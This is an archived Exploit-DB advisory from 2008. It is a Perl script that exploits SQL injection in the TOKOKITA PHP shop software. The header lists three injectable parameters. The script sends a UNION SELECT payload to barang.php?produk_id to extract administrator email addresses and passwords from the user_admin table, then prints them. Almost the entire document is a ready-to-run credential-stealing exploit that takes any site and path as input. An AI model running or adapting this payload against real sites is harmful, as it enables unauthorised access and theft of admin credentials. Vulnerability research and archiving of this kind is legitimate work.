TOKOKITA - 'produk_id' SQL Injection

EDB-ID:

5931

CVE:

N/A

Author:

k1tk4t

Type:

webapps

Platform:

PHP

Published:

2008-06-24

#!/usr/bin/perl
# k1tk4t Public Security Advisory
# ////////////////////////////////////////////////////////////
# TOKOKITA Multiple Remote SQL Injection 
# Demosite	: http://www.tokokita.net/toko/
# Vendor	: http://www.tokokita.com/
# Kutu		: 1. catlist.php?cat_id=[Blind SQLi]
#		  2. catlist_detail.php?cat_id=[Blind SQLi]
#	          3. barang.php?produk_id=[SQLi]
# Terimakasih untuk ;
# str0ke,DNX,n0c0py,L41n,
# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] 
use LWP::UserAgent;

if ( !$ARGV[1] ) {
	print "\n //////////////////////////////////////////////////////////////////";
	print "\n //                      ..::> k1tk4t <::..                      //";
	print "\n // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //";
	print "\n //////////////////////////////////////////////////////////////////";
	print "\n[!] ";
	print "\n[!] Penggunaan : perl tokokita.pl [Site] [Path]";
	print "\n[!] Contoh     : perl tokokita.pl localhost /toko/";
	print "\n[!] ";
	print "\n";
	exit;
}
$site   = $ARGV[0];
$path   = $ARGV[1];
$sqlinj = "union+
select+
null,
null,
null,
concat(0x6b3174,email,0x316e),
null,
concat(0x6b3474,password,0x307574),
null,
null,
null,
null,
null+
from+
user_admin/*";    
$expl = "http://" . $site . $path . "barang.php?produk_id=-9+"
. $sqlinj;
$www  = new LWP::UserAgent;
print "\n\n [!] Injeksi SQL \n";
$res = $www->get($expl) or err ();
$hasil = $res->content;
if ( $hasil =~ /k1t(.*?)1n/ ) {
	print "\n [+] Username      : $1";
	$hasil =~ /k4t(.*?)0ut/, print "\n [+] Password      : $1";
	print "\n\n";
} 
else {
	print "\n [-] Exploit gagal ;)";
	exit();
}

# milw0rm.com [2008-06-24]